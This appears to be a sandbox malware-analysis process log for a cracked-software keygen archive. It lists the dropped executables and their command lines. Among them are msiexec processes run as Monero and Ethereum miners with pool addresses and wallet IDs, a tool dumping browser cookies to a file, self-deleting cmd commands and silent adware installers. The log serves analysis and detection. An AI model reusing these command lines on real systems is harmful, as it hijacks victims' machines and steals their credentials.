      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
        6⤵
        
        PID:3964
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
        6⤵
        
        PID:1156
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4668 /prefetch:8
        6⤵
        
        PID:5292
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4976 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5460
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 /prefetch:8
        6⤵
        
        PID:6708
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5420 /prefetch:8
        6⤵
        
        PID:3160
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=656 /prefetch:2
        6⤵
        
        PID:6776
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
        6⤵
        
        PID:7636
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,15653010567113625077,16760943654270308388,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
        6⤵
        
        PID:7264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Modifies registry class
      PID:5080
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:5380
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:5784
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      PID:5584
    - - C:\Users\Admin\AppData\Roaming\859.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\859.tmp.exe"
        5⤵
        
        PID:5692
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w7608 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5404
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w18703@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:1344
    - - C:\Users\Admin\AppData\Roaming\A1F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A1F.tmp.exe"
        5⤵
        
        PID:6080
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A1F.tmp.exe
        6⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:6872
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:6260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:8104
    - - C:\ProgramData\1417674.exe
        
        "C:\ProgramData\1417674.exe"
        5⤵
        
        PID:748
    - - C:\ProgramData\8343363.exe
        
        "C:\ProgramData\8343363.exe"
        5⤵
        
        PID:5880
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        
        PID:6528
    - - C:\ProgramData\7970337.exe
        
        "C:\ProgramData\7970337.exe"
        5⤵
        
        PID:7400
      - C:\ProgramData\7970337.exe
        
        "{path}"
        6⤵
        
        PID:7324
      - C:\ProgramData\7970337.exe
        
        "{path}"
        6⤵
        
        PID:6312
      - C:\ProgramData\7970337.exe
        
        "{path}"
        6⤵
        
        PID:4564
    - - C:\ProgramData\4243102.exe
        
        "C:\ProgramData\4243102.exe"
        5⤵
        
        PID:7980
      - C:\ProgramData\4243102.exe
        
        "{path}"
        6⤵
        
        PID:7768
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      PID:7304
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:7020
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2512

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Carbide.UI.Theme.Edition.keygen.by.Lz0.zip\Lz0.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:852

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5888

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F308DC79A06AA9518B4CE030D43DAA67 C
  2⤵
  PID:5244
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding EB6C50044EBE7FF8FC165F8AB0B11B88
  2⤵
  PID:5768
- C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
  2⤵
  PID:5696
- - C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
    3⤵
    PID:4168
  - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
      4⤵
      PID:7672
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1e0,0x1f0,0x7ffa30d69ec0,0x7ffa30d69ed0,0x7ffa30d69ee0
        5⤵
        
        PID:8520
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
        5⤵
        
        PID:9664
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1844 /prefetch:8
        5⤵
        
        PID:9904
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=2208 /prefetch:8
        5⤵
        
        PID:7436
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2520 /prefetch:1
        5⤵
        
        PID:9548
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2856 /prefetch:2
        5⤵
        
        PID:10064
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1648 /prefetch:8
        5⤵
        
        PID:9288
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=3608 /prefetch:8
        5⤵
        
        PID:9828
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3516 /prefetch:2
        5⤵
        
        PID:4192
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=3416 /prefetch:8
        5⤵
        
        PID:2224
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=2132 /prefetch:8
        5⤵
        
        PID:8596
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1552,5505666541426475927,14954638270756597470,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7672_644345964" --mojo-platform-channel-handle=1496 /prefetch:8
        5⤵
        
        PID:8212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEA919.bat" "
    3⤵
    PID:8216
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
      4⤵
      Views/modifies file attributes
      PID:6656
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:6448
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEA919.bat"
      4⤵
      Views/modifies file attributes
      PID:7976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEA919.bat" "
      4⤵
      PID:9516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:9624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat" "
    3⤵
    PID:8804
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
      4⤵
      Views/modifies file attributes
      PID:8752
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:8576
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:9748
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat"
      4⤵
      Views/modifies file attributes
      PID:9960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEB7A1.bat" "
      4⤵
      PID:7044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:7500

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3728

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6800

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7724
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7db5df75-8bbf-6b47-95a4-137c382bd900}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4508
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
  2⤵
  PID:7436

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\942c89ce0a394683b03a2eac52376814 /t 5556 /p 3728
1⤵
PID:7640

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:7412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7464

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7348
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:6472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2916

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7308

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\87EA.exe
C:\Users\Admin\AppData\Local\Temp\87EA.exe
1⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\8DC7.exe
C:\Users\Admin\AppData\Local\Temp\8DC7.exe
1⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\B18C.exe
C:\Users\Admin\AppData\Local\Temp\B18C.exe
1⤵
PID:6488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B18C.exe"
  2⤵
  PID:6052
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:6068

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f7d0ebbeee8a423f99386fd341db5eea /t 6040 /p 8136
1⤵
PID:6008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7448

C:\Users\Admin\AppData\Local\Temp\CBEB.exe
C:\Users\Admin\AppData\Local\Temp\CBEB.exe
1⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\F445.exe
C:\Users\Admin\AppData\Local\Temp\F445.exe
1⤵
PID:4248
- C:\Users\Admin\AppData\Local\Temp\1302260226.exe
  "C:\Users\Admin\AppData\Local\Temp\1302260226.exe"
  2⤵
  PID:6388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    3⤵
    PID:8976
- C:\Users\Admin\AppData\Local\Temp\764823507.exe
  "C:\Users\Admin\AppData\Local\Temp\764823507.exe"
  2⤵
  PID:9208
- - C:\Users\Admin\AppData\Local\Temp\764823507.exe
    "C:\Users\Admin\AppData\Local\Temp\764823507.exe"
    3⤵
    PID:9496

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f976bb7e083e4a7aba5c679e0685ec15 /t 6560 /p 7448
1⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\1A7B.exe
C:\Users\Admin\AppData\Local\Temp\1A7B.exe
1⤵
PID:8264
- C:\Users\Admin\AppData\Local\Temp\1A7B.exe
  "{path}"
  2⤵
  PID:8540

C:\Users\Admin\AppData\Local\Temp\22F8.exe
C:\Users\Admin\AppData\Local\Temp\22F8.exe
1⤵
PID:8600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8864

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9068

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8372

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8276

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8060

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4924

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5360

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8252

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dea49e93ca4945a19aa23befb46ec5d5 /t 8336 /p 8252
1⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\is-DRL2O.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRL2O.tmp\vict.tmp" /SL5="$B0526,870426,780800,C:\Users\Admin\AppData\Local\Temp\a0352u2phsl\vict.exe" /VERYSILENT /id=535
1⤵
PID:9628
- C:\Users\Admin\AppData\Local\Temp\is-UTVFR.tmp\win1host.exe
  "C:\Users\Admin\AppData\Local\Temp\is-UTVFR.tmp\win1host.exe" 535
  2⤵
  PID:8964

C:\Users\Admin\AppData\Local\Temp\is-S66JA.tmp\Setup3310.tmp
